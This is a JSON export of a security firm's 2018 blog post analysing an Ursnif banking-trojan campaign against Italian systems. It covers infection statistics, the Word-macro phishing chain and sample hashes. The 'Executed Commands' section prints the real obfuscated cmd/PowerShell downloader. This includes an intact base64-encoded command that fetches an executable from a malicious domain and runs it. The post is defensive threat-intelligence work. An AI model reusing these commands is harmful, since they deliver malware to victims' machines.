{"id":349,"date":"2018-11-26T09:00:39","date_gmt":"2018-11-26T07:00:39","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=349"},"modified":"2026-06-08T22:45:14","modified_gmt":"2026-06-08T22:45:14","slug":"ursnif-attacks-italy","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/ursnif-attacks-italy\/","title":{"rendered":"Ursnif \u2014 attacks in Italy"},"content":{"rendered":"<p style=\"text-align: justify\"><strong>Ursnif<\/strong> is a Banking Trojan malware designed to maintain system access and steal user credentials through keylogging functionality.<\/p>\n<p style=\"text-align: justify\">The campaign identified and analysed represents the second wave of Ursnif attacks in November (YER, root folder of the distribution system). We tracked <strong>775 Italian systems<\/strong> compromised, representing <strong>46%<\/strong> of the total:<\/p>\n<figure id=\"attachment_423\" aria-describedby=\"caption-attachment-423\" style=\"width: 631px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" width=\"641\" height=\"294\" class=\"wp-image-423 size-full\" alt=\"Ursnif infections\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/Ursnif-infections.png\" loading=\"lazy\"><figcaption id=\"caption-attachment-423\" class=\"wp-caption-text\">Ursnif infections<\/figcaption><\/figure>\n<h2>Infections Italy and Worldwide<\/h2>\n<p style=\"text-align: justify\">Our research and analysis operations enabled us to obtain further details regarding systems compromised by Ursnif malware. The following represents the distribution of infections globally. Particularly noteworthy is that <strong>Italy represents a significant target<\/strong> for the criminal group deploying Ursnif malware.<\/p>\n<figure id=\"attachment_434\" aria-describedby=\"caption-attachment-434\" style=\"width: 682px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" width=\"692\" height=\"257\" class=\"wp-image-434 size-full\" alt=\"Ursnif - Attack Map\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/infezioni-ursnif.png\" loading=\"lazy\"><figcaption id=\"caption-attachment-434\" class=\"wp-caption-text\">Ursnif &#8211; Attack Map<\/figcaption><\/figure>\n<p>Distribution of infections in Italy highlighting the most affected provinces.<\/p>\n<figure id=\"attachment_449\" aria-describedby=\"caption-attachment-449\" style=\"width: 560px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" width=\"570\" height=\"322\" class=\"size-full wp-image-449\" alt=\"Ursnif Italia\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/Ursnif-Italia.png\" loading=\"lazy\"><figcaption id=\"caption-attachment-449\" class=\"wp-caption-text\">Ursnif Italia<\/figcaption><\/figure>\n<p style=\"text-align: justify\">The following images display details of Italian compromises. On one side, the list of <strong>Internet Service Providers<\/strong> to which devices with the highest number of infections are connected. On the left image, the list of primary IP addresses of <strong>compromised systems.<\/strong><\/p>\n<figure id=\"attachment_452\" aria-describedby=\"caption-attachment-452\" style=\"width: 318px\" class=\"wp-caption alignright\"><img decoding=\"async\" width=\"328\" height=\"280\" class=\"size-full wp-image-452\" alt=\"Ursnif - ISP Infected\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/ISP-Infected.png\" loading=\"lazy\"><figcaption id=\"caption-attachment-452\" class=\"wp-caption-text\">Ursnif &#8211; ISP Infected<\/figcaption><\/figure>\n<figure id=\"attachment_465\" aria-describedby=\"caption-attachment-465\" style=\"width: 213px\" class=\"wp-caption alignleft\"><img decoding=\"async\" width=\"223\" height=\"183\" class=\"wp-image-465 size-full\" alt=\"Compromissione sistemi aziendali\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/aziende.png\" title=\"Compromissione sistemi aziendali\" loading=\"lazy\"><figcaption id=\"caption-attachment-465\" class=\"wp-caption-text\">Compromissione sistemi aziendali<\/figcaption><\/figure>\n<h2 style=\"text-align: justify\">The Infection Process<\/h2>\n<p style=\"text-align: justify\">The system infection chain is now well-established: malicious emails containing Office suite documents, in this case <strong>Word<\/strong>, either as attachments or downloadable links. The malicious document contains a Macro that, if enabled, executes a series of system commands for compromise.<\/p>\n<figure id=\"attachment_354\" aria-describedby=\"caption-attachment-354\" style=\"width: 707px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" width=\"717\" height=\"462\" class=\"wp-image-354 size-full\" alt=\"Ursnif Word\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/Ursnif-Word.png\" loading=\"lazy\"><figcaption id=\"caption-attachment-354\" class=\"wp-caption-text\">Ursnif Word<\/figcaption><\/figure>\n<h4 style=\"text-align: justify\">Executed Commands<\/h4>\n<p style=\"text-align: justify\">The Word document does not contain the malware but acts as a <em>downloader.<\/em> It handles download and execution of the malware:<\/p>\n<h6 style=\"text-align: justify\"><strong>Step 1<\/strong> (obfuscated <em>cmd<\/em> command):<\/h6>\n<blockquote><p><span style=\"color: #000080;font-size: 10pt\">cMd.EXE \/c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^u^A^G^k^A^b^g^B^h^A^H^M^A^d^Q^B^r^A^G^E^A^c^w^B^o^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^Z^A^E^U^A^U^g^A^v^A^H^A^A^Z^Q^B^s^A^G^k^A^b^Q^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^H^U^A^b^A^B^v^A^G^Y^A^M^g^A^u^A^H^c^A^b^w^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^3^A^D^g^A^M^w^A^2^A^D^A^A^M^Q^B^l^A^D^g^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^c^A^O^A^A^z^A^D^Y^A^M^A^A^x^A^G^U^A^O^A^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^E^U^A^e^A^B^p^A^H^Q^A<\/span><\/p><\/blockquote>\n<h6 style=\"text-align: justify\"><strong>Step 2<\/strong> (<em>Powershell<\/em> command):<\/h6>\n<blockquote><p><span style=\"color: #000080;font-size: 10pt\">cMd.EXE \/c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBuAGkAbgBhAHMAdQBrAGEAcwBoAC4AYwBvAG0ALwBZAEUAUgAvAHAAZQBsAGkAbQAuAHAAaABwAD8AbAA9AHUAbABvAGYAMgAuAHcAbwBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAA3ADgAMwA2ADAAMQBlADgALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADcAOAAzADYAMAAxAGUAOAAuAGUAeABlACcAOwAgAEUAeABpAHQA<\/span><\/p><\/blockquote>\n<h6 style=\"text-align: justify\"><strong>Step 3<\/strong> (Base64 command decoding):<\/h6>\n<blockquote><p><span style=\"color: #000080;font-size: 10pt\">(New-Object System Net WebClient) DownloadFile(&#8220;http:\/\/ninasukash com\/YER\/pelim php?l=ulof2 wos&#8221;, $env:APPDATA + &#8216;\\783601e8 exe&#8217;);Start-Process $env:APPDATA&#8217;\\783601e8 exe&#8217;; Exit<\/span><\/p><\/blockquote>\n<h2 style=\"text-align: justify\">The URSNIF Malware<\/h2>\n<p style=\"text-align: justify\">The extracted Powershell command proceeds to download the Ursnif malware from the internet site <strong>ninasukash[.]com<\/strong>. Our <a href=\"https:\/\/fortgale.com\/en\/cyber-threat-intelligence\/\">Cyber Threat Intelligence<\/a> operations have identified this infrastructure as a persistent distribution vector for this Banking Trojan family.<\/p>\n<blockquote>\n<p style=\"text-align: justify\"><span style=\"font-size: 10pt\">{DownloadFile(&#8220;http:\/\/ninasukash com\/YER\/pelim php?l=ulof2 wos&#8221;, $env:APPDATA + &#8216;\\783601e8 exe&#8217;); }<\/span><\/p>\n<\/blockquote>\n<p style=\"text-align: justify\">and then immediately executed by the command portion:<\/p>\n<blockquote>\n<p style=\"text-align: justify\"><span style=\"font-size: 10pt\"> { Start-Process $env:APPDATA&#8217;\\783601e8 exe } .<\/span><\/p>\n<\/blockquote>\n<table style=\"border-collapse: collapse;width: 100%;height: 145px\" border=\"1\">\n<tbody>\n<tr style=\"height: 29px\">\n<td style=\"width: 50%;background-color: #22247a;height: 29px\"><span style=\"color: #ffffff;, courier, monospace;font-size: 10pt\"><strong>Info<\/strong><\/span><\/td>\n<td style=\"width: 50%;background-color: #22247a;height: 29px\"><span style=\"color: #ffffff;, courier, monospace;font-size: 10pt\"><strong>Value<\/strong><\/span><\/td>\n<\/tr>\n<tr style=\"height: 29px\">\n<td style=\"width: 50%;height: 29px\">\n<div class=\"enum\"><span style=\", courier, monospace;font-size: 10pt\"><strong><span class=\"field-key\">MD5<\/span><\/strong><\/span><\/div>\n<\/td>\n<td style=\"width: 50%;height: 29px;text-align: center\"><span style=\", courier, monospace;font-size: 10pt\">ab33b0f6560c16133339182b8c5030ce<\/span><\/td>\n<\/tr>\n<tr style=\"height: 29px\">\n<td style=\"width: 50%;height: 29px\"><span style=\", courier, monospace;font-size: 10pt\"><strong><span class=\"field-key\">SHA1<\/span><\/strong><\/span><\/td>\n<td style=\"width: 50%;height: 29px;text-align: center\"><span style=\", courier, monospace;font-size: 10pt\">261cb3e5595f4cca5a0c0a12006288e48a8f6d1e<\/span><\/td>\n<\/tr>\n<tr style=\"height: 29px\">\n<td style=\"width: 50%;height: 29px\"><span class=\"field-key\" style=\", courier, monospace;font-size: 10pt\"><strong>SHA256<\/strong><br \/>\n<\/span><\/td>\n<td style=\"width: 50%;height: 29px;text-align: center\"><span style=\", courier, monospace;font-size: 10pt\">0ce4392261f6d8d0a2fa666b649860716527f41ea90de948fb03affed69a50ac<\/span><\/td>\n<\/tr>\n<tr style=\"height: 29px\">\n<td style=\"width: 50%;height: 29px\"><span style=\", courier, monospace;font-size: 10pt\"><strong>VirusTotal<\/strong><\/span><\/td>\n<td style=\"width: 50%;height: 29px;text-align: center\"><span style=\", courier, monospace;font-size: 10pt\"><a href=\"https:\/\/www.virustotal.com\/en\/file\/0ce4392261f6d8d0a2fa666b649860716527f41ea90de948fb03affed69a50ac\/analysis\/\">VirusTotal Link<\/a><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: justify\">Further technical details are available in the second part of this analysis. The infection chain observed\u2014macro-enabled Office documents, obfuscated command execution, and multi-stage payload delivery\u2014remains a persistent attack vector requiring endpoint detection and response capabilities to identify and contain Banking Trojan infections at scale.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ursnif campaigns aimed at Italian organisations: phishing lures in Italian, payload delivery patterns and C2 hosting trends observed across multiple waves.<\/p>\n","protected":false},"author":1,"featured_media":449,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[3202,435,178,179,188,3144,212,213,3201,337,362,368,374],"class_list":["post-349","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","tag-banking-trojan-campaigns","tag-fortgale-report","tag-infection","tag-infections","tag-italia","tag-italian-threat-landscape","tag-malware","tag-malware-analysis","tag-phishing-italy","tag-statistics","tag-trojan","tag-ursnif","tag-virus"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/349","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=349"}],"version-history":[{"count":2,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/349\/revisions"}],"predecessor-version":[{"id":9868,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/349\/revisions\/9868"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=349"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=349"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=349"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}